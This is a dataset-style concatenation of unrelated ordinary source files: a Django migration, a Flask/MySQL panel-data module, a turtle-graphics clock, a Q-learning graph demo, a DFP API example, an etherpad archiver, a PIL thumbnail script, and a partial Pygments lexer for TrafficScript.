print(' '.join(numList))
| [
"chdan565@gamil.com"
] | chdan565@gamil.com |
7180394060ae55aeb4c339d0562f330eaaf40bca | 56bf6c68e78257e887de9e5eae11fc6652ce7f06 | /bbdd/Scripts/bbdd/productos/migrations/0002_auto_20170313_1111.py | 971ae6caf6b0803bf878e97cde5caee4a2089a6a | [] | no_license | CarlosSanz81/bbdd | 1d1c670e16f0e8ee81fb929767d8f65b7361cbe3 | 3b1febaddfef93fffeb34c3970281e4a37d05146 | refs/heads/master | 2023-01-09T03:20:02.042514 | 2017-03-13T11:07:15 | 2017-03-13T11:07:15 | 84,815,195 | 0 | 1 | null | 2022-12-20T09:00:14 | 2017-03-13T10:45:00 | Python | UTF-8 | Python | false | false | 3,508 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-13 10:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration (Django 1.10.6, 2017-03-13).

    Repurposes the ``producto`` model from product/quote fields towards
    customer/address data: renames four fields, removes four, adds contact
    and address columns, and widens ``isbn`` to a 13-digit decimal.
    Generated code — do not hand-edit; create a follow-up migration instead.
    """

    dependencies = [
        ('productos', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='producto',
            old_name='descripcion_cliente',
            new_name='apellido1',
        ),
        migrations.RenameField(
            model_name='producto',
            old_name='nombre_cliente',
            new_name='apellido2',
        ),
        migrations.RenameField(
            model_name='producto',
            old_name='presupuesto',
            new_name='codigoImprenta',
        ),
        migrations.RenameField(
            model_name='producto',
            old_name='numero_cliente',
            new_name='cp',
        ),
        migrations.RemoveField(
            model_name='producto',
            name='fijo',
        ),
        migrations.RemoveField(
            model_name='producto',
            name='image',
        ),
        migrations.RemoveField(
            model_name='producto',
            name='margen',
        ),
        migrations.RemoveField(
            model_name='producto',
            name='numero_parte',
        ),
        migrations.AddField(
            model_name='producto',
            name='direcc',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='fecha',
            field=models.DateTimeField(auto_now=True),
        ),
        migrations.AddField(
            model_name='producto',
            name='movil',
            field=models.DecimalField(decimal_places=0, default=0, max_digits=9),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='nombre',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='nombreCompleto',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='pedido',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='poblacion',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='provincia',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='remesa',
            field=models.CharField(default=0, max_length=255),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='producto',
            name='telefono',
            field=models.DecimalField(decimal_places=0, default=0, max_digits=9),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='producto',
            name='isbn',
            field=models.DecimalField(decimal_places=0, max_digits=13),
        ),
    ]
| [
"carlossanzgarcia81@gmail.com"
] | carlossanzgarcia81@gmail.com |
62c94db115f11585424e8df49b2baf70d5c8bc4d | 9a486a87e028303a551fbd0d1e1b6b650387ea14 | /propose/anim/me_send/human_skin.py | 23974e36ca1961c8edd87e9707c50518b46b0440 | [] | no_license | shanlihou/pythonFunc | 7b8e7064fddd4522e492c915c086cc6c5abc6eec | 646920256551ccd8335446dd4fe11aa4b9916f64 | refs/heads/master | 2022-08-24T20:33:12.287464 | 2022-07-21T12:00:10 | 2022-07-21T12:00:10 | 24,311,639 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py |
# Sprite parts making up the animated character.  Each entry appears to be
# (part_name, (x, y), texture_file, flag1, flag2, scale) —
# NOTE(review): the meaning of the coordinate pair and the two boolean flags
# is inferred from the names only; confirm against the animation loader
# before relying on this description.
skin = [
    ('head', (174, 229), 'me.png', True, True, 0.2),
    ('upper_arm1', (11, 56), 'all.png', True, True, 0.2),
    ('lower_arm1', (11, 59), 'all.png', True, True, 0.2),
    ('upper_arm2', (9, 60), 'all.png', True, True, 0.2),
    ('lower_arm2', (8, 60), 'all.png', True, True, 0.2),
    ('upper_leg1', (11, 58), 'all.png', True, True, 0.2),
    ('lower_leg1', (9, 63), 'all.png', True, True, 0.2),
    ('upper_leg2', (11, 57), 'all.png', True, True, 0.2),
    ('lower_leg2', (11, 59), 'all.png', True, True, 0.2),
    ('body', (24, 124), 'all.png', True, True, 0.5),
    ('cell_phone', (24, 124), 'cellphone.png', True, True, 0.5),
]
| [
"shanlihou@gmail.com"
] | shanlihou@gmail.com |
a99808919eadfeaef81265b7cda8db9b9fd19fe4 | b834509b4d3bf3b9161c3ac9ea2984af17bebf5e | /icvUI/dbsession/panel.py | de24cb4c4d427413ea39deb950f953065b7ee523 | [] | no_license | RichardZhong/meiduo | a338dc6b78da71df60ebff7827c5ba6225081650 | 4d530b4870d3353daaf4b1505998156595055073 | refs/heads/master | 2020-08-22T12:12:07.870793 | 2018-09-26T03:26:49 | 2018-09-26T03:26:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,861 | py | from icvUI.dbsession import *
# Fetch the cameras assigned to the panel-reading feature.
def query_panel_camera():
    """Return all panel cameras with their description and calibration data.

    Returns a list of dict rows (camera_id, description, ori_data), or None
    if the query fails.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        query_sql = "SELECT panel_ori.camera_id,description,ori_data FROM camera,panel_ori WHERE FIND_IN_SET('panel',application) AND panel_ori.camera_id = camera.camera_id ORDER BY panel_ori.camera_id;"
        cursor.execute(query_sql)
        return cursor.fetchall()
    except Exception as e:
        print(e)
        return None
    finally:
        # Close only what was actually opened: the original called
        # cursor.close()/conn.close() unconditionally and raised
        # UnboundLocalError whenever mc.connect() itself failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
def query_panel_label():
    """Return all panel label rows (label_zh), or None on failure."""
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        cursor.execute("SELECT label_zh FROM panel_label;")
        return cursor.fetchall()
    except Exception as e:
        print(e)
        return None
    finally:
        # Guarded close: the original raised UnboundLocalError in this
        # finally block when mc.connect() failed before cursor existed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Fetch the stored first frame image for one panel camera.
def query_panel_first_frame(camera_id):
    """Return the panel_first_frame row for camera_id, or None.

    Returns a dict with keys camera_id and frame_img when a row exists.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        # Parameterized query: the original embedded '{camera_id}' in a plain
        # (non-f) string, so MySQL matched the literal text "{camera_id}";
        # binding also prevents SQL injection.
        query_sql = "SELECT camera_id, frame_img FROM panel_first_frame WHERE camera_id = %s;"
        cursor.execute(query_sql, (camera_id,))
        return cursor.fetchone()
    except Exception as e:
        print(e)
        return None
    finally:
        # Guarded close to avoid UnboundLocalError when connect() failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Store calibration data for one panel camera.
def update_panel_data(camera_id, ori_data):
    """Update panel_ori.ori_data for camera_id.

    Returns 'ok' on success and 'wrong' on failure (original contract).
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        # Bind values instead of str.format to prevent SQL injection and
        # quoting problems with arbitrary ori_data payloads.
        update_sql = "UPDATE panel_ori SET ori_data = %s WHERE camera_id = %s;"
        cursor.execute(update_sql, (ori_data, camera_id))
        conn.commit()
        return 'ok'
    except Exception as e:
        print(e)
        return 'wrong'
    finally:
        # Guarded close to avoid UnboundLocalError when connect() failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Fetch the most recent panel-reading result for one camera.
def query_latest_panel(camera_id):
    """Return the newest panel_result row for camera_id, or None.

    The alarm_type column is flattened to a comma-separated string before
    the row is returned.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        # Parameterized query: the original embedded '{camera_id}' in a plain
        # (non-f) string, so the literal text "{camera_id}" was queried.
        # With bound parameters, literal % signs (DATE_FORMAT) must be
        # doubled per MySQL Connector/Python's execute() rules.
        query_sql = ("SELECT description,panel_result.camera_id,status_type,alarm_data,"
                     "panel_picture,DATE_FORMAT(time,'%%Y-%%m-%%d %%T') AS time,alarm_type "
                     "FROM camera,panel_result WHERE panel_result.camera_id = %s "
                     "AND camera.camera_id = panel_result.camera_id "
                     "ORDER BY time DESC LIMIT 0,1;")
        cursor.execute(query_sql, (camera_id,))
        data = cursor.fetchone()
        if not data:
            return None
        data['alarm_type'] = ",".join(list(data['alarm_type']))
        return data
    except Exception as e:
        print(e)
        return None
    finally:
        # Guarded close to avoid UnboundLocalError when connect() failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Fetch a page of panel-reading history, optionally filtered by status.
def query_panel_history(offset, limit, search):
    """Return {'total': N, 'rows': [...]} of panel results, newest first.

    `search` of "正常"/"异常" filters on that status; any other value
    returns all rows.  Paging is applied in Python after the fetch, and each
    returned row's alarm_type is flattened to a comma-separated string.
    Returns None on failure.
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        query_sql = ("SELECT panel_result.camera_id,status_type,alarm_data,panel_picture,"
                     "description,alarm_type,DATE_FORMAT(time,'%Y-%m-%d %T') AS time "
                     "FROM camera,panel_result "
                     "WHERE panel_result.camera_id = camera.camera_id")
        # `search` is compared against two trusted constants, so direct
        # interpolation is safe; the original duplicated the entire query
        # three times just for this one clause.
        if search in ("正常", "异常"):
            query_sql += " AND panel_result.status_type = '%s'" % search
        query_sql += " ORDER BY time DESC;"
        cursor.execute(query_sql)
        data = cursor.fetchall()
        returndata = data[offset:offset + limit]
        for single in returndata:
            single['alarm_type'] = ",".join(list(single['alarm_type']))
        return {'total': len(data), 'rows': returndata}
    except Exception as e:
        print(e)
        return None
    finally:
        # Guarded close to avoid UnboundLocalError when connect() failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Store the interval between routine daily snapshots.
def update_panel_interval(interval):
    """Insert or update the single panel_daily_time row holding `interval`.

    Returns 'ok' on success and 'wrong' on failure (original contract).
    """
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        cursor.execute("SELECT * FROM panel_daily_time;")
        data = cursor.fetchall()
        # Parameterized statements: the original built them with
        # '{interval}' in a plain (non-f) string, so the literal text
        # "{interval}" was stored; binding also prevents SQL injection.
        if len(data) == 0:
            cursor.execute("INSERT INTO panel_daily_time(time_interval) VALUES(%s);", (interval,))
        else:
            cursor.execute("UPDATE panel_daily_time SET time_interval = %s;", (interval,))
        conn.commit()
        return 'ok'
    except Exception as e:
        print(e)
        return 'wrong'
    finally:
        # Guarded close to avoid UnboundLocalError when connect() failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
# Read back the interval between routine daily snapshots.
def query_panel_interval():
    """Return the panel_daily_time rows with a human-readable interval label.

    Returns '' when the table is empty, None on failure; otherwise the first
    row's time_interval is replaced by its Chinese display label.
    """
    # Minutes-to-label mapping used by the UI.
    time_hash = {
        "10": "10分钟",
        "30": "30分钟",
        "60": "1小时",
        "120": "2小时",
        "180": "3小时",
    }
    conn = None
    cursor = None
    try:
        conn = mc.connect(**fs_icv_db)
        cursor = conn.cursor(dictionary=True)
        cursor.execute("SELECT * FROM panel_daily_time;")
        data = cursor.fetchall()
        if len(data) == 0:
            data = ''
        else:
            raw = data[0]['time_interval']
            # Fall back to the raw value for unmapped intervals; the original
            # raised KeyError here, which the broad except turned into None.
            data[0]['time_interval'] = time_hash.get(raw, raw)
        return data
    except Exception as e:
        print(e)
        return None
    finally:
        # Guarded close to avoid UnboundLocalError when connect() failed.
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
"xwp_fullstack@163.com"
] | xwp_fullstack@163.com |
a7c4f424709c906decef7ac3409403229846dd1c | c77a40408bc40dc88c466c99ab0f3522e6897b6a | /Programming_basics/Exercise_7/AgencyProfit.py | a3938967800366d45453b1a08b8b42eed96dad4e | [] | no_license | vbukovska/SoftUni | 3fe566d8e9959d390a61a4845381831929f7d6a3 | 9efd0101ae496290313a7d3b9773fd5111c5c9df | refs/heads/main | 2023-03-09T17:47:20.642393 | 2020-12-12T22:14:27 | 2021-02-16T22:14:37 | 328,805,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | name = input()
elder_tickets = int(input())
child_tickets = int(input())
elder_ticket_price = float(input())
fee = float(input())
elder_fin_price = elder_ticket_price + fee
child_fin_price = elder_ticket_price * 0.3 + fee
total = elder_tickets * elder_fin_price + child_tickets * child_fin_price
profit = total * 0.2
print(f'The profit of your agency from {name} tickets is {profit:.2f} lv.')
| [
"vbukovska@yahoo.com"
] | vbukovska@yahoo.com |
74707c9d2c81498ed5fdb4c8f86098f7a2885d48 | a31de016611f3b4efc7a576e7113cad1a738419b | /2017/turtle_grafik/101computing.net/turtle_clock.py | 807e976a1aea285185ccdd4507415e444013ccf9 | [] | no_license | Ing-Josef-Klotzner/python | 9d4044d632672fff966b28ab80e1ef77763c78f5 | 3913729d7d6e1b7ac72b46db7b06ca0c58c8a608 | refs/heads/master | 2022-12-09T01:40:52.275592 | 2022-12-01T22:46:43 | 2022-12-01T22:46:43 | 189,040,355 | 0 | 0 | null | 2022-12-01T19:52:37 | 2019-05-28T14:05:16 | Python | UTF-8 | Python | false | false | 2,072 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
"""
Created on Mon Sep 25 23:16:54 2017
@author: josef
"""
# Analog clock drawn with turtle graphics: a dial with second and hour tick
# marks, then an endless loop that redraws the hour, minute and second hands
# roughly once per second.
import turtle, datetime, time
myPen = turtle.Turtle()
myPen.shape("arrow")
myPen.tracer(0)
myPen.speed(0)
myPen.shapesize(.5,1)
turtle.delay(0)
# Dial outline: a circle of radius 180 centred on the origin.
myPen.penup()
myPen.goto(0,-180)
myPen.pendown()
myPen.pensize(3)
myPen.color("blue")
myPen.circle(180)
for wi in range(6,361,6): # 360/60 = 6 degrees -- one tick per second (60 ticks)
    myPen.penup()
    myPen.goto(0,0)
    myPen.setheading(wi)
    myPen.fd(160)
    myPen.pendown()
    myPen.fd(10)
myPen.pensize(6)
for wi in range(30,361,30): # 360/12 = 30 degrees -- one thicker tick per hour
    myPen.penup() # ticks at 3, 6, 9 and 12 o'clock are drawn longer
    myPen.goto(0,0)
    myPen.setheading(wi)
    if wi % 90 == 0:
        myPen.fd(155)
        myPen.down()
        myPen.fd(15)
    else:
        myPen.fd(160)
        myPen.pendown()
        myPen.fd(10)
myPen.pensize(3)
while True:
    myPen.color("red")
    currentSecond = datetime.datetime.now().second
    currentMinute = datetime.datetime.now().minute
    currentHour = datetime.datetime.now().hour
    # Hour hand: 30 degrees per hour plus the fraction contributed by
    # minutes and seconds.
    myPen.penup()
    myPen.goto(0,0)
    myPen.setheading(90) # Point to the top - 12 o'clock
    myPen.right(currentHour*360/12+currentMinute*360/12/60+currentSecond*360/12/60/60)
    myPen.pendown()
    myPen.pensize(7)
    myPen.forward(100)
    myPen.stamp()
    # Minute hand: 6 degrees per minute plus the seconds fraction.
    myPen.penup()
    myPen.goto(0,0)
    myPen.setheading(90) # Point to the top - 0 minutes
    myPen.right(currentMinute*360/60+currentSecond*360/60/60)
    myPen.pendown()
    myPen.pensize(5)
    myPen.forward(130)
    myPen.stamp()
    # Second hand (green), drawn from a dot at the centre.
    myPen.color("green")
    myPen.penup()
    myPen.goto(0,0)
    myPen.pensize(7)
    myPen.dot()
    myPen.pensize(3)
    myPen.setheading(90) # Point to the top - 0 seconds
    myPen.right(currentSecond*360/60)
    myPen.pendown()
    myPen.forward(140)
    myPen.getscreen().update()
    time.sleep(.99)
    # Undo this frame's strokes (stamped hands, dot, second hand) before
    # redrawing in the next iteration.
    for _ in range(20):
        myPen.undo()
# myPen.getscreen().update()
#turtle.done()
| [
"josef.klotzner@gmail.com"
] | josef.klotzner@gmail.com |
c4b6a3f62693ae3839dab962a54b3148f679bc02 | 21c8e8fee35d736938d22bfd01d4f8aa0f81b79e | /app.py | 14a3dc6627e061c994804fbd9b2d09ae8cab479f | [
"MIT"
] | permissive | betatim/etherbrain | 320d4accdc789325b94feafab18aa6e49cea8564 | 910152032825861248cc300b0388c07112fff5db | refs/heads/master | 2021-01-16T21:22:31.676169 | 2016-02-11T17:32:28 | 2016-02-11T17:32:28 | 51,532,606 | 1 | 0 | null | 2016-02-11T17:33:01 | 2016-02-11T17:33:00 | null | UTF-8 | Python | false | false | 2,028 | py | import os
import requests
from github3 import login
from flask import (
Response,
Flask,
g,
request
)
GH_TOKEN = os.getenv("TOKEN")
FORK_ME = """<a href="https://github.com/etherpad-archive/etherbrain"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://camo.githubusercontent.com/365986a132ccd6a44c23a9169022c0b5c890c387/68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f6769746875622f726962626f6e732f666f726b6d655f72696768745f7265645f6161303030302e706e67" alt="Fork me on GitHub" data-canonical-src="https://s3.amazonaws.com/github/ribbons/forkme_right_red_aa0000.png"></a>"""
app = Flask(__name__)
app.debug = True
@app.route('/moz/<path:path>/')
def moz_pad(path):
    """Archive the public Mozilla etherpad *path* into the GitHub Pages repo.

    Fetches the pad's plain-text export, then creates or updates
    moz/<path>.md in etherpad-archive/etherpad-archive.github.io and
    returns a link to the published page.
    """
    ether_path = "https://public.etherpad-mozilla.org/p/{}".format(path)
    req = requests.get(ether_path + "/export/txt")

    gh = login('etherbrain', token=GH_TOKEN)
    r = gh.repository('etherpad-archive', 'etherpad-archive.github.io')
    contents = r.contents(path='moz')
    # NOTE(review): debug print left in — route output goes to server logs;
    # consider removing or switching to logging.
    print(contents)
    fname = path + ".md"
    # NOTE(review): assumes contents is keyed by bare file names ("x.md");
    # some github3 versions key by full path ('moz/x.md') — confirm against
    # the pinned github3 release.
    if contents is None or fname not in contents:
        # create it for the first time
        r.create_file("moz/{}.md".format(path),
                      'etherpad from {}'.format(ether_path),
                      content=req.content)
    else:
        # update the file
        f = contents[fname]
        f.update('updated etherpad from {}'.format(ether_path),
                 content=req.content)

    return Response(
        'Check out: <a href="http://etherpad-archive.github.io/moz/{path}.md"'
        '>http://etherpad-archive.github.io/moz/{path}.md</a>'.format(path=path)
    )
@app.route('/')
def index():
    """Landing page: explains how to trigger an archive run."""
    page = (
        "<html><head><title>Etherpad brain</title></head>"
        "<body><h1>Hello I am the etherpad brain</h1>"
        "<p>To archive https://public.etherpad-mozilla.org/p/XXX visit"
        " https://etherbrain.herokuapp.com/moz/XXX/</p>"
        "{}</body></html>"
    ).format(FORK_ME)
    return Response(page)


if __name__ == "__main__":
    app.run(debug=True)
| [
"betatim@gmail.com"
] | betatim@gmail.com |
ecc34043983b03b3988be9dcd00276282e219b79 | 41523dd4871e8ed1043d2b3ddf73417fcbdde209 | /day10/第三方模块.py | 160b4dccef65869bcc8a653e7c6817dce1eb9e80 | [] | no_license | WayneChen1994/Python1805 | 2aa1c611f8902b8373b8c9a4e06354c25f8826d6 | a168cd3b7749afc326ec4326db413378fd3677d5 | refs/heads/master | 2020-03-30T23:19:00.773288 | 2018-11-02T10:47:40 | 2018-11-02T10:47:40 | 151,697,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 640 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Wayne.Chen
'''
Third-party libraries must be installed before use.
Option 1: install with pip
    Command format: pip install <package-name>
    If an error occurs, upgrade pip first, then try a different network.
Option 2: install through PyCharm's package manager.
'''
from PIL import Image
# Open the image file, producing an Image object.
im = Image.open('ppp.jpg')
# Read basic information from the opened image:
# im.format: the image format (e.g. JPEG)
# im.size: the image dimensions (width, height)
print(im.format, im.size)
# Shrink the image in place so it fits within 500x200 (thumbnail).
im.thumbnail((500, 200))
# Save under a new name; arg 1: file name, arg 2: image format.
im.save('pppp.jpg', 'JPEG')
| [
"waynechen1994@163.com"
] | waynechen1994@163.com |
692ffcf5c4f607be9f55703706c8341c7ac328f9 | 16640092d62417c32677ee2f7c63a913c11de51a | /test.py | ba098b066ee0dc2ba43422cf0389de84cad9cdf9 | [] | no_license | reakain/rob538hw2 | 2cacd5ea0c394d262420093f31c50acd029322ff | 07249df900380353020be57ce8a4eebed904e904 | refs/heads/main | 2022-12-25T17:11:08.513206 | 2020-10-13T03:10:24 | 2020-10-13T03:10:24 | 303,574,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,769 | py | # from https://amunategui.github.io/reinforcement-learning/index.html
import numpy as np
import pylab as plt
# Q-learning demo on a small graph world: nodes are states, edges are the
# allowed moves, and node `goal` is the terminal reward state.
# map cell to cell, add circular cell to goal point
points_list = [(0,1), (1,5), (5,6), (5,4), (1,2), (2,3), (2,7)]

goal = 7

import networkx as nx
# Visualise the world graph before training.
G=nx.Graph()
G.add_edges_from(points_list)
pos = nx.spring_layout(G)
nx.draw_networkx_nodes(G,pos)
nx.draw_networkx_edges(G,pos)
nx.draw_networkx_labels(G,pos)
plt.show()

# how many points in graph? x points
MATRIX_SIZE = 8

# create matrix x*y
# Reward matrix: -1 = no edge, 0 = traversable edge, 100 = edge into goal.
R = np.matrix(np.ones(shape=(MATRIX_SIZE, MATRIX_SIZE)))
R *= -1

# assign zeros to paths and 100 to goal-reaching point
for point in points_list:
    print(point)
    if point[1] == goal:
        R[point] = 100
    else:
        R[point] = 0

    if point[0] == goal:
        R[point[::-1]] = 100
    else:
        # reverse of point (edges are bidirectional)
        R[point[::-1]]= 0

# add goal point round trip
R[goal,goal]= 100

# Q-value table, filled in by the training loop below.
Q = np.matrix(np.zeros([MATRIX_SIZE,MATRIX_SIZE]))

# learning parameter (discount factor)
gamma = 0.8

initial_state = 1
def available_actions(state):
    # Valid moves from `state` are the columns of reward row R[state,]
    # with a non-negative value (-1 marks a missing edge).
    current_state_row = R[state,]
    av_act = np.where(current_state_row >= 0)[1]
    return av_act

available_act = available_actions(initial_state)
def sample_next_action(available_actions_range):
    """Pick one action uniformly at random from the given action set.

    The original ignored its parameter and read the module-level
    ``available_act`` global instead, so a caller could never sample from a
    different action set; behaviour at the existing call sites (which always
    pass the current ``available_act``) is unchanged.
    """
    return int(np.random.choice(available_actions_range, 1))
action = sample_next_action(available_act)

def update(current_state, action, gamma):
    # One Q-learning step: Q(s, a) = R(s, a) + gamma * max_a' Q(a, a'),
    # where the greedy successor value is read from row `action` (the state
    # reached by taking the action).
    max_index = np.where(Q[action,] == np.max(Q[action,]))[1]
    if max_index.shape[0] > 1:
        # Break ties between equally good successors at random.
        max_index = int(np.random.choice(max_index, size = 1))
    else:
        max_index = int(max_index)
    max_value = Q[action, max_index]

    Q[current_state, action] = R[current_state, action] + gamma * max_value
    print('max_value', R[current_state, action] + gamma * max_value)

    # Normalised progress score, used only for the convergence plot.
    if (np.max(Q) > 0):
        return(np.sum(Q/np.max(Q)*100))
    else:
        return (0)

update(initial_state, action, gamma)
# Training: 700 episodes of single-step updates from random start states.
scores = []
for i in range(700):
    current_state = np.random.randint(0, int(Q.shape[0]))
    available_act = available_actions(current_state)
    action = sample_next_action(available_act)
    score = update(current_state,action,gamma)
    scores.append(score)
    print ('Score:', str(score))

print("Trained Q matrix:")
print(Q/np.max(Q)*100)

# Testing: greedy walk from node 0 following the learned Q values.
# NOTE(review): the goal is hard-coded as 7 here (not `goal`), and the loop
# never terminates if training has not converged.
current_state = 0
steps = [current_state]

while current_state != 7:
    next_step_index = np.where(Q[current_state,] == np.max(Q[current_state,]))[1]
    if next_step_index.shape[0] > 1:
        next_step_index = int(np.random.choice(next_step_index, size = 1))
    else:
        next_step_index = int(next_step_index)
    steps.append(next_step_index)
    current_state = next_step_index

print("Most efficient path:")
print(steps)

plt.plot(scores)
plt.show()
"reakain@users.noreply.github.com"
] | reakain@users.noreply.github.com |
f8c13f56bef005c37b573d17ed303454226ba230 | 7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a | /examples/adspygoogle/dfp/v201101/get_lica.py | 121e4466b8d92878321c9c97d2374a5552ef0e28 | [
"Apache-2.0"
] | permissive | hockeyprincess/google-api-dfp-python | 534519695ffd26341204eedda7a8b50648f12ea9 | efa82a8d85cbdc90f030db9d168790c55bd8b12a | refs/heads/master | 2021-01-10T10:01:09.445419 | 2011-04-14T18:25:38 | 2011-04-14T18:25:38 | 52,676,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,958 | py | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets a line item creative association (LICA) by the line
item and creative id. To determine which line items exist, run
get_all_line_items.py. To determine which creatives exit, run
get_all_creatives.py."""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set line item and creative id to use to retrieve the LICA.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
creative_id = 'INSERT_CREATIVE_ID_HERE'
# Get LICA.
lica = lica_service.GetLineItemCreativeAssociation(line_item_id, creative_id)[0]
# Display results.
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['lineItemId'], lica['creativeId'],
lica['status']))
| [
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] | api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138 |
048ac96b3f749f1c876f5b098fc2d9c763c14bfd | c418bd9d730bc17653611da7f0642bdd25cba65f | /djangosite/myapp/models.py | 24937ec6ecd5ae57cc064366c022229598fdac16 | [] | no_license | ErDeepakSingh/Ajax-State-City | ae18a4f4b8ef8e90932d8aed74553897d7ac9b3b | 72a31424bd9402ef2c76198ee80934ac399fccf9 | refs/heads/master | 2020-08-16T02:29:36.081445 | 2019-10-16T02:51:22 | 2019-10-16T02:51:22 | 215,443,208 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | from django.db import models
# Create your models here.
class Student(models.Model):
    """Signup record for a student: name, unique email, phone and password."""
    name = models.CharField(max_length=25)
    email = models.EmailField(unique=True)  # natural key, shown by __str__
    joined = models.DateTimeField(auto_now_add=True)  # set once at creation
    phone = models.CharField(max_length=10, default='')
    # NOTE(review): password is stored in plain text — switch to Django's
    # auth framework / hashed passwords before production use.
    password = models.CharField(max_length=16, default='')
    def __str__(self):
        return self.email + " - " + self.phone
| [
"deepakthakur755@gmail.com"
] | deepakthakur755@gmail.com |
82dac2f11d268d0f7a2d30e10b1a6ca670013859 | 9c4e02ba5201794a4c5cbff548db1be7c87409c1 | /venv/lib/python3.9/site-packages/pygments/lexers/trafficscript.py | 67ecd243cb3c15db119f07cd6007ebb986f19d42 | [
"MIT",
"Apache-2.0"
] | permissive | ClassWizard/PodLockParser | 4faf4679d404158b3cf2b1ceb4faabca461b0008 | 84f6d3fced521849657d21ae4cb9681f5897b957 | refs/heads/master | 2022-12-23T20:39:48.096729 | 2022-02-08T09:49:01 | 2022-02-08T09:49:01 | 167,668,617 | 2 | 1 | MIT | 2022-12-14T10:01:41 | 2019-01-26T08:50:35 | Python | UTF-8 | Python | false | false | 1,512 | py | """
pygments.lexers.trafficscript
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lexer for RiverBed's TrafficScript (RTS) language.
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer
from pygments.token import String, Number, Name, Keyword, Operator, Text, Comment
__all__ = ['RtsLexer']
class RtsLexer(RegexLexer):
    """
    For `Riverbed Stingray Traffic Manager <http://www.riverbed.com/stingray>`_

    .. versionadded:: 2.1
    """
    name = 'TrafficScript'
    aliases = ['trafficscript', 'rts']
    filenames = ['*.rts']

    tokens = {
        'root' : [
            # Single-quoted strings: only \\ and \<char> escapes, no sub-state.
            (r"'(\\\\|\\[^\\]|[^'\\])*'", String),
            # Double-quoted strings handle escapes in the sub-state below.
            (r'"', String, 'escapable-string'),
            (r'(0x[0-9a-fA-F]+|\d+)', Number),
            (r'\d+\.\d+', Number.Float),
            # TrafficScript variables are $-prefixed identifiers.
            (r'\$[a-zA-Z](\w|_)*', Name.Variable),
            (r'(if|else|for(each)?|in|while|do|break|sub|return|import)', Keyword),
            # Bare identifiers (optionally dotted) are treated as function names.
            (r'[a-zA-Z][\w.]*', Name.Function),
